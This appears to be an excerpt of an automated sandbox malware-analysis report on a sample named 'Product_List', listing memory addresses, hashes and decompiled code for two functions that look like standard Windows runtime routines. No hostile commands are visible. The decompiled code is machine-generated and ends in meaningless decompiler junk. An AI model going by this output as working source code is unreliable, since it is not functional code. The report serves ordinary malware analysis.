                                                      0x017c4a02
                                                      0x00000000
                                                      0x017c4a02
                                                      0x017c4972
                                                      0x017c4974
                                                      0x00000000
                                                      0x00000000
                                                      0x017c4976
                                                      0x017c4979
                                                      0x017c4982
                                                      0x017c4983
                                                      0x017c4984
                                                      0x017c498b
                                                      0x017c498d
                                                      0x017c4991
                                                      0x017c4993
                                                      0x017c4999
                                                      0x017c499d
                                                      0x017c49a2
                                                      0x017c49a2
                                                      0x017c49a2
                                                      0x017c4999
                                                      0x017c49ac
                                                      0x00000000
                                                      0x017c49b3
                                                      0x017c48f8
                                                      0x017c48fe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017c48fe
                                                      0x017c4895
                                                      0x017c489c
                                                      0x017c48ad
                                                      0x017c48b2
                                                      0x017c48b5
                                                      0x017c48b7
                                                      0x017c48ba
                                                      0x017c48bc
                                                      0x017c48c6
                                                      0x017c48c6
                                                      0x017c48cb
                                                      0x017c48d1
                                                      0x017c48d4
                                                      0x017c48d8
                                                      0x017c48d8
                                                      0x00000000
                                                      0x017c48d8
                                                      0x017c48be
                                                      0x017c48c0
                                                      0x00000000
                                                      0x00000000
                                                      0x017c48c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017c48c4
                                                      0x00000000
                                                      0x017c4882
                                                      0x017c487b
                                                      0x017c4904
                                                      0x017c4906
                                                      0x00000000
                                                      0x00000000
                                                      0x017c4908
                                                      0x017c490e
                                                      0x00000000
                                                      0x00000000
                                                      0x017c4910
                                                      0x017c4917
                                                      0x017c4917
                                                      0x00000000
                                                      0x017c4917
                                                      0x0176b1ba
                                                      0x017c47f9
                                                      0x017c47fc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017c47fc
                                                      0x0176b1c0
                                                      0x0176b1c0
                                                      0x0176b1c3
                                                      0x0176b1cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: _vswprintf_s
                                                      • String ID:
                                                      • API String ID: 677850445-0
                                                      • Opcode ID: e5843a7dfce786ae248f84ccfb58a912a4df1167b818b6feb56cec658c06062f
                                                      • Instruction ID: 79271f692f5450158546a3fcec0cd93da4bac9e4d88361ec96d736e36067a7d9
                                                      • Opcode Fuzzy Hash: e5843a7dfce786ae248f84ccfb58a912a4df1167b818b6feb56cec658c06062f
                                                      • Instruction Fuzzy Hash: BC51B075D0026A8EEF35CF68C854BEEFBF0AF45B10F1042ADD85AAB286D7744941CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0178B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0178B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x185d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01787D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01838CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L017A9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L017AB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L017ACE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01787D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L01838F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L017AAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1858628; // 0x0
								_v68 = _t77;
								_t78 =  *0x185862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1858628; // 0x0
							_t116 =  *0x185862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                      0x0178b94c
                                                      0x0178b956
                                                      0x0178b95c
                                                      0x0178b95e
                                                      0x0178b964
                                                      0x0178b969
                                                      0x0178b96d
                                                      0x0178b96d
                                                      0x0178b970
                                                      0x0178b974
                                                      0x0178b97a
                                                      0x0178badf
                                                      0x0178badf
                                                      0x0178bae2
                                                      0x0178bae4
                                                      0x0178bae6
                                                      0x0178baf0
                                                      0x017d2cb8
                                                      0x0178baf6
                                                      0x0178baf6
                                                      0x0178baf6
                                                      0x0178bafd
                                                      0x0178bb1f
                                                      0x0178bb1f
                                                      0x0178baff
                                                      0x0178bb00
                                                      0x0178bb00
                                                      0x0178bb03
                                                      0x0178bb03
                                                      0x0178bacb
                                                      0x0178bacf
                                                      0x0178bad0
                                                      0x0178bad1
                                                      0x0178badc
                                                      0x0178badc
                                                      0x0178b980
                                                      0x0178b980
                                                      0x0178b988
                                                      0x0178b98b
                                                      0x0178b98d
                                                      0x0178b990
                                                      0x0178b993
                                                      0x0178b999
                                                      0x0178b99b
                                                      0x0178b9a1
                                                      0x0178b9a5
                                                      0x0178b9aa
                                                      0x0178b9b0
                                                      0x0178b9bb
                                                      0x0178b9c0
                                                      0x0178b9c3
                                                      0x0178b9ca
                                                      0x0178b9cc
                                                      0x0178b9cf
                                                      0x0178b9d3
                                                      0x0178b9d7
                                                      0x0178ba94
                                                      0x0178ba94
                                                      0x0178ba98
                                                      0x0178baa3
                                                      0x017d2ccb
                                                      0x0178baa9
                                                      0x0178baa9
                                                      0x0178baa9
                                                      0x0178bab1
                                                      0x017d2cd5
                                                      0x017d2cdd
                                                      0x017d2cdd
                                                      0x0178babb
                                                      0x0178babc
                                                      0x0178bac2
                                                      0x0178bac3
                                                      0x0178bac3
                                                      0x0178bac6
                                                      0x00000000
                                                      0x0178b9dd
                                                      0x0178b9dd
                                                      0x0178b9e7
                                                      0x0178b9e7
                                                      0x0178b9ec
                                                      0x0178b9ec
                                                      0x0178b9f1
                                                      0x0178b9f5
                                                      0x0178b9fa
                                                      0x0178ba00
                                                      0x0178ba0c
                                                      0x0178ba10
                                                      0x0178ba10
                                                      0x0178ba12
                                                      0x0178ba18
                                                      0x00000000
                                                      0x00000000
                                                      0x0178bb26
                                                      0x0178bb26
                                                      0x0178ba1e
                                                      0x0178ba1e
                                                      0x0178ba23
                                                      0x0178ba25
                                                      0x0178ba2c
                                                      0x0178ba30
                                                      0x0178ba35
                                                      0x0178ba35
                                                      0x0178ba41
                                                      0x0178ba46
                                                      0x0178ba4c
                                                      0x0178ba50
                                                      0x0178ba54
                                                      0x0178ba6a
                                                      0x0178ba6e
                                                      0x0178ba70
                                                      0x0178ba74
                                                      0x0178ba78
                                                      0x0178ba7a
                                                      0x0178ba7c
                                                      0x0178ba8e
                                                      0x0178ba90
                                                      0x0178ba92
                                                      0x0178bb14
                                                      0x0178bb14
                                                      0x0178bb16
                                                      0x0178bb16
                                                      0x00000000
                                                      0x0178ba7c
                                                      0x0178bb0a
                                                      0x0178bb0d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0178bb0f

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0178B9A5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 885266447-0
                                                      • Opcode ID: 0f004020b3cde7cade6f4b3e6f8ed681acdfd4b0bcbc218aaf97c71322f590ed
                                                      • Instruction ID: c00fe111a85c2c827ea39d7181bea6f96422abe46e1d94597744112ea7a8e76f
                                                      • Opcode Fuzzy Hash: 0f004020b3cde7cade6f4b3e6f8ed681acdfd4b0bcbc218aaf97c71322f590ed
                                                      • Instruction Fuzzy Hash: 82516671A08741CFC720EF69C08092AFBF5FB88610F64896EFA9687355D770E944CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01792581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E01792581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, void* _a12, void* _a16, void* _a20, void* _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				void* _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t275;
				signed int _t281;
				signed int _t283;
				void* _t285;
				void* _t286;
				unsigned int _t290;
				signed int _t294;
				void* _t295;
				signed int _t321;
				signed int _t323;
				signed int _t328;
				signed int _t329;
				signed int _t331;
				void* _t332;
				signed int _t335;
				signed int _t338;
				signed int _t339;
				void* _t343;

				_t335 = _t338;
				_t339 = _t338 - 0x4c;
				_v8 =  *0x185d360 ^ _t335;
				_t328 = 0x185b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t290 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t343 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t281 = 0x48;
				_t310 = 0 | _t343 == 0x00000000;
				_t321 = 0;
				_v37 = _t343 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t329 = 0xc0000106;
						goto L32;
					} else {
						_t328 = L01784620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t328;
						__eflags = _t328;
						if(_t328 == 0) {
							_t329 = 0xc0000017;
							goto L32;
						} else {
							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
							_t50 = _t328 + 0x48; // 0x48
							_t323 = _t50;
							_t310 = _v32;
							 *(_t328 + 0x3c) = _t281;
							_t283 = 0;
							 *((short*)(_t328 + 0x30)) = _v48;
							__eflags = _t310;
							if(_t310 != 0) {
								 *(_t328 + 0x18) = _t323;
								__eflags = _t310 - 0x1858478;
								 *_t328 = ((0 | _t310 == 0x01858478) - 0x00000001 & 0xfffffffb) + 7;
								E017AF3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
								_t310 = _v32;
								_t339 = _t339 + 0xc;
								_t283 = 1;
								__eflags = _a8;
								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t275 = E017F39F2(_t323);
									_t310 = _v32;
									_t323 = _t275;
								}
							}
							_t294 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t329 = _v68;
								__eflags = 0;
								 *((short*)(_t323 - 2)) = 0;
								goto L32;
							} else {
								_t281 = _t328 + _t283 * 4;
								_v56 = _t281;
								do {
									__eflags = _t310;
									if(_t310 != 0) {
										_t240 =  *(_v60 + _t294 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t281 =  *(_v60 + _t294 * 4);
										 *(_t281 + 0x18) = _t323;
										_t244 =  *(_v60 + _t294 * 4);
										__eflags = _t244 - 8;
										if(__eflags > 0) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01792959))) {
												case 0:
													__ax =  *0x1858488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E017AF3E0(__edi,  *0x185848c, __ax & 0x0000ffff);
														__eax =  *0x1858488 & 0x0000ffff;
														goto L26;
													}
													goto L126;
												case 1:
													L45:
													E017AF3E0(_t323, _v80, _v64);
													_t270 = _v64;
													goto L26;
												case 2:
													 *0x1858480 & 0x0000ffff = E017AF3E0(__edi,  *0x1858484,  *0x1858480 & 0x0000ffff);
													__eax =  *0x1858480 & 0x0000ffff;
													__eax = ( *0x1858480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E017AF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L126;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E017AF3E0(_t323, _v76, _v36);
														_t270 = _v36;
													}
													L26:
													_t339 = _t339 + 0xc;
													_t323 = _t323 + (_t270 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t272);
													 *((short*)(_t323 - 2)) = _t272;
													goto L28;
												case 6:
													__ebx =  *0x185575c;
													__eflags = __ebx - 0x185575c;
													if(__ebx != 0x185575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E017AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x185575c;
														} while (__ebx != 0x185575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1858478 & 0x0000ffff = E017AF3E0(__edi,  *0x185847c,  *0x1858478 & 0x0000ffff);
													__eax =  *0x1858478 & 0x0000ffff;
													__eax = ( *0x1858478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E017F39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1856e58 & 0x0000ffff = E017AF3E0(__edi,  *0x1856e5c,  *0x1856e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1856e58 & 0x0000ffff;
													__eax = ( *0x1856e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t294 = _v16;
													_t310 = _v32;
													L29:
													_t281 = _t281 + 4;
													__eflags = _t281;
													_v56 = _t281;
													goto L30;
											}
										}
									}
									goto L126;
									L30:
									_t294 = _t294 + 1;
									_v16 = _t294;
									__eflags = _t294 - _v48;
								} while (_t294 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t321 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01792935))) {
							case 0:
								__ax =  *0x1858488;
								__eflags = __ax;
								if(__eflags != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t310 =  &_v64;
								_v80 = L01792E3E(0,  &_v64);
								_t281 = _t281 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1858480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1858480;
									goto L98;
								}
								goto L14;
							case 3:
								__eax = L0177EEF0(0x18579a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L75();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0177EB70(__ecx, 0x18579a0);
									__eflags = __esi - 0xc0000100;
									if(__eflags == 0) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t290 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1857b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0177EB70(__ecx, 0x18579a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t335;
										_pop(_t282);
										return L017AB640(_t219, _t282, _v8 ^ _t335, _t310, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L75();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L126;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t277 = _v56;
								if(_v56 != 0) {
									_t310 =  &_v36;
									_t279 = L01792E3E(_t277,  &_v36);
									_t290 = _v36;
									_v76 = _t279;
								}
								if(_t290 == 0) {
									goto L44;
								} else {
									_t281 = _t281 + 2 + _t290;
								}
								goto L14;
							case 6:
								__eax =  *0x1855764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1858478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1858478;
									L98:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1856e58 & 0x0000ffff;
								__eax = ( *0x1856e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t310 = _v37;
									goto L1;
								}
								goto L126;
						}
					}
					L56:
					_t295 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					if(__eflags < 0) {
						asm("o16 sub [ecx+0x1], bh");
					}
					_t105 = _t295 + 1;
					 *_t105 =  *(_t295 + 1) - _t281;
					__eflags =  *_t105;
					asm("loopne 0x29");
					if(__eflags < 0) {
						if (__eflags >= 0) goto L62;
					}
					if(__eflags < 0) {
						_t328 = _t328 + 1;
						__eflags = _t328;
					}
					 *(_t295 + 1) =  *(_t295 + 1) - _t281;
					_t245 = _t244 + 0x1f017926;
					__eflags = _t245;
					_pop(_t285);
					if(_t245 < 0) {
						_t245 = _t339;
					}
					 *(_t295 + 1) =  *(_t295 + 1) - _t285;
					_t246 = _t245 ^ 0x02017d5b;
					 *(_t295 + 1) =  *(_t295 + 1) - _t323;
					 *_t246 =  *_t246 - 0x79;
					_t331 = _t328 + _t328;
					__eflags = _t331;
					asm("daa");
					if(_t331 < 0) {
						_push(ds);
					}
					 *(_t295 + 1) =  *(_t295 + 1) - _t285;
					_t332 = _t331 - 1;
					_t116 = _t295 + 1;
					 *_t116 =  *(_t295 + 1) - _t285;
					__eflags =  *_t116;
					asm("daa");
					if(__eflags < 0) {
						asm("fcomp dword [ebx+0x7d]");
					}
					_pop(_t286);
					if(__eflags < 0) {
						_t246 = 0x28;
					}
					_t118 = _t295 + 1;
					 *_t118 =  *(_t295 + 1) - _t286;
					__eflags =  *_t118;
				}
				L126:
			}











































                                                      0x01792584
                                                      0x01792586
                                                      0x01792590
                                                      0x01792599
                                                      0x0179259e
                                                      0x017925a4
                                                      0x017925a9
                                                      0x017925ac
                                                      0x017925ae
                                                      0x017925b1
                                                      0x017925b2
                                                      0x017925b5
                                                      0x017925b8
                                                      0x017925bb
                                                      0x017925bc
                                                      0x017925bf
                                                      0x017925c2
                                                      0x017925c5
                                                      0x017925c6
                                                      0x017925cb
                                                      0x017925ce
                                                      0x017925d8
                                                      0x017925db
                                                      0x017925dd
                                                      0x017925de
                                                      0x017925e1
                                                      0x017925e3
                                                      0x017925e9
                                                      0x017926da
                                                      0x017926da
                                                      0x017926dd
                                                      0x017926e2
                                                      0x017d5b56
                                                      0x00000000
                                                      0x017926e8
                                                      0x017926f9
                                                      0x017926fb
                                                      0x017926fe
                                                      0x01792700
                                                      0x017d5b60
                                                      0x00000000
                                                      0x01792706
                                                      0x01792706
                                                      0x0179270a
                                                      0x0179270a
                                                      0x0179270d
                                                      0x01792713
                                                      0x01792716
                                                      0x01792718
                                                      0x0179271c
                                                      0x0179271e
                                                      0x017d5b6c
                                                      0x017d5b6f
                                                      0x017d5b7f
                                                      0x017d5b89
                                                      0x017d5b8e
                                                      0x017d5b93
                                                      0x017d5b96
                                                      0x017d5b9c
                                                      0x017d5ba0
                                                      0x017d5ba3
                                                      0x017d5bab
                                                      0x017d5bb0
                                                      0x017d5bb3
                                                      0x017d5bb3
                                                      0x017d5ba3
                                                      0x01792724
                                                      0x01792726
                                                      0x01792729
                                                      0x0179272c
                                                      0x0179279d
                                                      0x0179279d
                                                      0x017927a0
                                                      0x017927a2
                                                      0x00000000
                                                      0x0179272e
                                                      0x0179272e
                                                      0x01792731
                                                      0x01792734
                                                      0x01792734
                                                      0x01792736
                                                      0x017d5bc1
                                                      0x017d5bc1
                                                      0x017d5bc4
                                                      0x00000000
                                                      0x017d5bca
                                                      0x017d5bca
                                                      0x017d5bcd
                                                      0x00000000
                                                      0x017d5bd3
                                                      0x00000000
                                                      0x017d5bd3
                                                      0x017d5bcd
                                                      0x0179273c
                                                      0x0179273c
                                                      0x01792742
                                                      0x01792747
                                                      0x0179274a
                                                      0x0179274d
                                                      0x01792750
                                                      0x00000000
                                                      0x01792756
                                                      0x01792756
                                                      0x00000000
                                                      0x01792902
                                                      0x01792908
                                                      0x0179290b
                                                      0x00000000
                                                      0x01792911
                                                      0x0179291c
                                                      0x01792921
                                                      0x00000000
                                                      0x01792921
                                                      0x00000000
                                                      0x00000000
                                                      0x01792880
                                                      0x01792887
                                                      0x0179288c
                                                      0x00000000
                                                      0x00000000
                                                      0x01792805
                                                      0x0179280a
                                                      0x01792814
                                                      0x01792816
                                                      0x00000000
                                                      0x00000000
                                                      0x0179281e
                                                      0x01792821
                                                      0x01792823
                                                      0x00000000
                                                      0x01792829
                                                      0x01792829
                                                      0x01792831
                                                      0x0179283c
                                                      0x0179283e
                                                      0x00000000
                                                      0x0179283e
                                                      0x00000000
                                                      0x00000000
                                                      0x0179284e
                                                      0x01792850
                                                      0x01792851
                                                      0x01792854
                                                      0x01792857
                                                      0x0179285a
                                                      0x0179285c
                                                      0x0179285d
                                                      0x00000000
                                                      0x00000000
                                                      0x0179275d
                                                      0x01792761
                                                      0x00000000
                                                      0x01792767
                                                      0x0179276e
                                                      0x01792773
                                                      0x01792773
                                                      0x01792776
                                                      0x01792778
                                                      0x0179277e
                                                      0x0179277e
                                                      0x01792781
                                                      0x01792781
                                                      0x01792783
                                                      0x01792784
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5bd8
                                                      0x017d5bde
                                                      0x017d5be4
                                                      0x017d5be6
                                                      0x017d5be8
                                                      0x017d5be9
                                                      0x017d5bee
                                                      0x017d5bf8
                                                      0x017d5bff
                                                      0x017d5c01
                                                      0x017d5c04
                                                      0x017d5c07
                                                      0x017d5c0b
                                                      0x017d5c0d
                                                      0x017d5c0d
                                                      0x017d5c15
                                                      0x017d5c18
                                                      0x017d5c1b
                                                      0x017d5c1b
                                                      0x017d5c1e
                                                      0x00000000
                                                      0x00000000
                                                      0x017928c3
                                                      0x017928c8
                                                      0x017928d2
                                                      0x017928d4
                                                      0x017928d8
                                                      0x017928db
                                                      0x017d5c26
                                                      0x017d5c28
                                                      0x017d5c2d
                                                      0x017d5c2d
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5c34
                                                      0x017d5c36
                                                      0x017d5c49
                                                      0x017d5c4e
                                                      0x017d5c54
                                                      0x017d5c5b
                                                      0x017d5c5d
                                                      0x017d5c60
                                                      0x01792788
                                                      0x01792788
                                                      0x0179278b
                                                      0x0179278e
                                                      0x0179278e
                                                      0x0179278e
                                                      0x01792791
                                                      0x00000000
                                                      0x00000000
                                                      0x01792756
                                                      0x01792750
                                                      0x00000000
                                                      0x01792794
                                                      0x01792794
                                                      0x01792795
                                                      0x01792798
                                                      0x01792798
                                                      0x00000000
                                                      0x01792734
                                                      0x0179272c
                                                      0x01792700
                                                      0x017925ef
                                                      0x017925ef
                                                      0x017925ef
                                                      0x017925f2
                                                      0x017925f8
                                                      0x00000000
                                                      0x00000000
                                                      0x017925fe
                                                      0x00000000
                                                      0x017928e6
                                                      0x017928ec
                                                      0x017928ef
                                                      0x017928f5
                                                      0x017928f8
                                                      0x017928f8
                                                      0x00000000
                                                      0x017928f8
                                                      0x00000000
                                                      0x00000000
